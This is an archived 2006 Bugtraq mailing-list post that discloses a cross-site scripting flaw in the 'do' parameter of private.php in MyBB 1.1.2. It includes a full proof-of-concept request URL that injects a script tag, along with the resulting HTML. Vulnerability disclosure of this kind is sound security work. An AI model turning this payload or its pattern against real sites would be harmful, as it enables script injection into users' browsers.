lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060606072142.30836.qmail@securityfocus.com> Date: 6 Jun 2006 07:21:42 -0000 From: o.y.6@...mail.com To: bugtraq@...urityfocus.com Subject: MyBB 1.1.2 New XSS // MyBB 1.1.2 New XSS File :- private.php Ver. :- $do = $mybb->input['do']; Line :- 260 Action :- Preview HTTP Proof :- /mybb/private.php?to=asda&subject=asd%3E&font=-&size=-&color=-&mode=advanced&message=sd&options%5Bsavecopy%5D=yes&options%5Breadreceipt%5D=yes&action=do_send&pmid=&do=D3vil-0x1%22%3E%3Cscript%3Ealert(1);%3C/script%3E&preview=Preview // Code <input type="hidden" name="do" value="D3vil-0x1"><script>alert(1);</script>" /> //